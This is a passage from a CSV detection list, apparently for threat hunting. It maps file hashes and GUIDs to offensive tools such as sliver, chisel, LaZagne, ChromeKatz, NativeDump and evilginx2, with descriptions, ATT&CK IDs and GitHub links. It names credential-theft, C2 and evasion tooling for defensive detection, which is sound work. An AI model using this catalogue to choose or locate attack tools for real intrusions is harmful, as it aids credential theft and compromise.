- TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*2476217e429b83ee5584cd469558a374e054a604929150314e671f140f5d55c8*",".{0,1000}2476217e429b83ee5584cd469558a374e054a604929150314e671f140f5d55c8.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*247b2e43787899a0235e4c0e97d819f0e05d3403c30e2d87c8b0a8ca80a74e8d*",".{0,1000}247b2e43787899a0235e4c0e97d819f0e05d3403c30e2d87c8b0a8ca80a74e8d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*247f15b5f3b38c9cf825f0df792e38e68fe4d69a72d21f596b9b73f570408278*",".{0,1000}247f15b5f3b38c9cf825f0df792e38e68fe4d69a72d21f596b9b73f570408278.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*24b3db5da23d7a56cfff2480ff4fb63ccb8fad4522c490b4478a22711a3ffa1c*",".{0,1000}24b3db5da23d7a56cfff2480ff4fb63ccb8fad4522c490b4478a22711a3ffa1c.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*24C53132B594B77D2109CAEE3E276EA4603EEF32BFECD5121746DB58258C50F7*",".{0,1000}24C53132B594B77D2109CAEE3E276EA4603EEF32BFECD5121746DB58258C50F7.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - 
TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*25125be2945ae98284abb64b279fe13021d1d02895b85a4e02a4fcd6ec8415cc*",".{0,1000}25125be2945ae98284abb64b279fe13021d1d02895b85a4e02a4fcd6ec8415cc.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*2532d6935c32487a273e2f360f73df80c2a9f57620c865d8cc10b9ccf7a9d629*",".{0,1000}2532d6935c32487a273e2f360f73df80c2a9f57620c865d8cc10b9ccf7a9d629.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*254389e27339fd66920dd72f3ad07fe2e220f6b0cbea8032cf0b1d8285a7b098*",".{0,1000}254389e27339fd66920dd72f3ad07fe2e220f6b0cbea8032cf0b1d8285a7b098.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" 
"*2553a72abc7f19fbd345e3e85fd73aa883d062e893ed4f7b47ffd7648c16a063*",".{0,1000}2553a72abc7f19fbd345e3e85fd73aa883d062e893ed4f7b47ffd7648c16a063.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*25564409a011c563e9623b376593512115515704a5ed932dd18c20a040c8640c*",".{0,1000}25564409a011c563e9623b376593512115515704a5ed932dd18c20a040c8640c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*2557d33f3a8599158820c409813b53a521cb3d0993352cd45b75f80eecd33f07*",".{0,1000}2557d33f3a8599158820c409813b53a521cb3d0993352cd45b75f80eecd33f07.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*2562c158d4f10ab67c20710da74463876e093473b56e7e1900a163133c1765b5*",".{0,1000}2562c158d4f10ab67c20710da74463876e093473b56e7e1900a163133c1765b5.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*25861c1cc31e530c5f8162e78585f40697c28164fd3c561d3d1a31442ee1ec17*",".{0,1000}25861c1cc31e530c5f8162e78585f40697c28164fd3c561d3d1a31442ee1ec17.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*25879dae8a91b9cb647c49ace109e948db08e6198565f167233a45fb14bfe5bb*",".{0,1000}25879dae8a91b9cb647c49ace109e948db08e6198565f167233a45fb14bfe5bb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2589213f0c51583dcbaacbe0005e5908*",".{0,1000}2589213f0c51583dcbaacbe0005e5908.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*25aac4494a46799c4755d9bda39314d628134ee58dd6f724ee905373c3600343*",".{0,1000}25aac4494a46799c4755d9bda39314d628134ee58dd6f724ee905373c3600343.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*25c0d247d2a85d8372a542255d8ef45a41f6b43633b0a6869b62cab393490d81*",".{0,1000}25c0d247d2a85d8372a542255d8ef45a41f6b43633b0a6869b62cab393490d81.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*25d4635f8b5fea969f8c93a459f6fd0b0e333150254df3fc8963a7d19dd9a754*",".{0,1000}25d4635f8b5fea969f8c93a459f6fd0b0e333150254df3fc8963a7d19dd9a754.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*25d74d144c6c9bfd48b8746e20868ac4d699d4514baa136e53ee5f60ed02b962*",".{0,1000}25d74d144c6c9bfd48b8746e20868ac4d699d4514baa136e53ee5f60ed02b962.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*25ec3ba7a4464210dd357b8454807c4163e761a46ccaa4bdd0b6c77e6b065fa5*",".{0,1000}25ec3ba7a4464210dd357b8454807c4163e761a46ccaa4bdd0b6c77e6b065fa5.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*26085f4768e13063e5dde27f0e313854ce91aa032a7b26d4f57ebc03a6628560*",".{0,1000}26085f4768e13063e5dde27f0e313854ce91aa032a7b26d4f57ebc03a6628560.{0,1000}","offensive_tool_keyword","KExecDD","Admin to Kernel code execution using the KSecDD driver","T1068 - T1055.011","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/floesen/KExecDD","1","0","N/A","8","2","172","27","2024-04-19T09:58:14Z","2024-04-19T08:54:49Z" "*2609239cc8bc517f684285133622e8b11192fb456e2dc2937aa2c6c2379a9d38*",".{0,1000}2609239cc8bc517f684285133622e8b11192fb456e2dc2937aa2c6c2379a9d38.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*2611455f4d60bc80f43cb13f480c6bee70497fffea48ed5c0b7d67e7fce33a52*",".{0,1000}2611455f4d60bc80f43cb13f480c6bee70497fffea48ed5c0b7d67e7fce33a52.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*261f880e-4bee-428d-9f64-c29292002c19*",".{0,1000}261f880e\-4bee\-428d\-9f64\-c29292002c19.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege 
Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*26311efd632bf07e682b31290fb2815b92e6d7880d21d9b7e87ea1a08c0b4326*",".{0,1000}26311efd632bf07e682b31290fb2815b92e6d7880d21d9b7e87ea1a08c0b4326.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*2659c2d40606e2b088c3bbd6fd6a293692ac7f219221844071abf434a638e1da*",".{0,1000}2659c2d40606e2b088c3bbd6fd6a293692ac7f219221844071abf434a638e1da.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*2661F29C-69F5-4010-9198-A418C061DD7C*",".{0,1000}2661F29C\-69F5\-4010\-9198\-A418C061DD7C.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" 
"*26695658d9cd9108527921dc351de3b717d37d849d0390ad7b9a6f0bb4d474a9*",".{0,1000}26695658d9cd9108527921dc351de3b717d37d849d0390ad7b9a6f0bb4d474a9.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "*26953f6a9ae961392ed1484e9c7ace1211f5f962*",".{0,1000}26953f6a9ae961392ed1484e9c7ace1211f5f962.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*269ede3b8c442b06d71872f817438e42d9184d58598e11163ff7227c2fe7513e*",".{0,1000}269ede3b8c442b06d71872f817438e42d9184d58598e11163ff7227c2fe7513e.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*26c6bb7444c17775d6d8ade749c26de554949030dabb6b04b73d69fc5cb10a03*",".{0,1000}26c6bb7444c17775d6d8ade749c26de554949030dabb6b04b73d69fc5cb10a03.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*26e18c8672146105fd4aed794f8d2305c635117eaea1de3e30b8f91473449b86*",".{0,1000}26e18c8672146105fd4aed794f8d2305c635117eaea1de3e30b8f91473449b86.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*26e511920655fd8129d9d192f9ab2801a23c379bd4690bc1d71b5b94a9e99310*",".{0,1000}26e511920655fd8129d9d192f9ab2801a23c379bd4690bc1d71b5b94a9e99310.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*26ea3ae0e97214aa81bdb686d78a7ac4f30debec364a682992ec767fcc45fbc1*",".{0,1000}26ea3ae0e97214aa81bdb686d78a7ac4f30debec364a682992ec767fcc45fbc1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*26edf5820094951dd18e20e86b1151d7113f1e17b64f1d3817d4995885559850*",".{0,1000}26edf5820094951dd18e20e86b1151d7113f1e17b64f1d3817d4995885559850.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*26f5c3b1de7bc524883c2f5620ac07e5bed58bc8149a9d1ecafa47d586a5693a*",".{0,1000}26f5c3b1de7bc524883c2f5620ac07e5bed58bc8149a9d1ecafa47d586a5693a.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline separated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*270a5bef7babe4f56bdb59cb9af2b506d019e33b1d9399f42f361bf5655007b1*",".{0,1000}270a5bef7babe4f56bdb59cb9af2b506d019e33b1d9399f42f361bf5655007b1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2711dda772bc1073c031d6044b5fe5eddc6943420ebd7e214e0b5e60adcd89d6*",".{0,1000}2711dda772bc1073c031d6044b5fe5eddc6943420ebd7e214e0b5e60adcd89d6.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*274F19EC-7CBA-4FC7-80E6-BB41C1FE6728*",".{0,1000}274F19EC\-7CBA\-4FC7\-80E6\-BB41C1FE6728.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","10","3","291","34","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z" "*276920b603e0c97637aa451452128bdfa855a7144d71fff6849db6f078b6f4dd*",".{0,1000}276920b603e0c97637aa451452128bdfa855a7144d71fff6849db6f078b6f4dd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2779330e5c98c950e2a6f60c24efed1824ed30deb5862399f3e3da8a0c7fca92*",".{0,1000}2779330e5c98c950e2a6f60c24efed1824ed30deb5862399f3e3da8a0c7fca92.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*277a6480b44c253c13a117b1c62717c7ec7f0053a0f69f57c9a4c9c5f9283d5d*",".{0,1000}277a6480b44c253c13a117b1c62717c7ec7f0053a0f69f57c9a4c9c5f9283d5d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2796d1c48d81be1ec426e9c09cbffede41df1a6e4fdb337f999b6a62d5e05b91*",".{0,1000}2796d1c48d81be1ec426e9c09cbffede41df1a6e4fdb337f999b6a62d5e05b91.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*27c9fbfb654f5b01c554dd9883ec3764c17a56bdc34a701ebd5ae8f2a8fb074a*",".{0,1000}27c9fbfb654f5b01c554dd9883ec3764c17a56bdc34a701ebd5ae8f2a8fb074a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*27E42E24-9F76-44E2-B1D6-82F68D5C4466*",".{0,1000}27E42E24\-9F76\-44E2\-B1D6\-82F68D5C4466.{0,1000}","offensive_tool_keyword","POC","Local Privilege Escalation from Admin to Kernel vulnerability on Windows 10 and Windows 11 operating systems with HVCI enabled.","T1055.011 - 